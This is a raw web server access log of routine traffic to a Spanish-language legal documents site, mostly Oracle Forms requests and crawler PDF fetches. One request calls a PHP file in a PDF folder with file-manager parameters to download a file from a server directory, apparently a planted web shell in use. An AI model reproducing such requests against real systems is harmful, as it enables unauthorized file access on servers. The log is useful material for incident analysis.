201.245.192.253 - - [24/Jun/2024:07:58:51 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 8
201.245.192.253 - - [24/Jun/2024:07:58:52 -0500] "GET /forms/java/oracle/forms/engine/RunformBundle_es_CO.class HTTP/1.1" 404 362
201.245.192.253 - - [24/Jun/2024:07:58:52 -0500] "GET /forms/java/oracle/forms/engine/RunformBundle_es_CO.class HTTP/1.1" 404 362
201.245.192.253 - - [24/Jun/2024:07:58:52 -0500] "GET /forms/java/oracle/forms/engine/RunformBundle_es_CO.properties HTTP/1.1" 404 367
66.249.66.20 - - [24/Jun/2024:07:58:52 -0500] "GET /BLA/resoluciones/AUTOS%202020/0553.pdf HTTP/1.1" 200 363495
201.245.192.253 - - [24/Jun/2024:07:58:52 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2728
201.245.192.253 - - [24/Jun/2024:07:58:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [24/Jun/2024:07:58:54 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [24/Jun/2024:07:58:56 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=1002&usuario=&sector=&fecha=2016&resuelve= HTTP/1.1" 200 1166
47.128.111.85 - - [24/Jun/2024:07:58:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2&f=CONTRIBUTING.md&ft=download HTTP/1.1" 200 731
66.249.66.19 - - [24/Jun/2024:07:58:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/4470.pdf HTTP/1.1" 200 390782
201.245.192.253 - - [24/Jun/2024:07:59:00 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 3396
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "HEAD /imagenes/rt_pset.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "HEAD /imagenes/rt_exit.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "HEAD /imagenes/rt_help.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "GET /imagenes/rt_exit.gif HTTP/1.1" 200 916
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 7
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [24/Jun/2024:07:59:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.155.43.93 - - [24/Jun/2024:07:59:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 2515842
66.249.66.19 - - [24/Jun/2024:07:59:04 -0500] "GET /BLA/resoluciones/AUTOS%202020/1969.pdf HTTP/1.1" 200 458730
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d68bf2a63bb8114a309b53b5e0240382cb.e3iSbxaKaheRe3uRb3iRc3mRci1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 9626
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "HEAD /imagenes/rt_quer1.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "HEAD /imagenes/rt_quer2.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "HEAD /imagenes/rt_quer3.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "HEAD /imagenes/rt_radd.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "HEAD /imagenes/rt_rdel.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "HEAD /imagenes/rt_rec1.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "HEAD /imagenes/rt_rec4.gif HTTP/1.1" 200 -
201.245.192.253 - - [24/Jun/2024:07:59:05 -0500] "HEAD /imagenes/rt_save.gif HTTP/1.1" 200 -
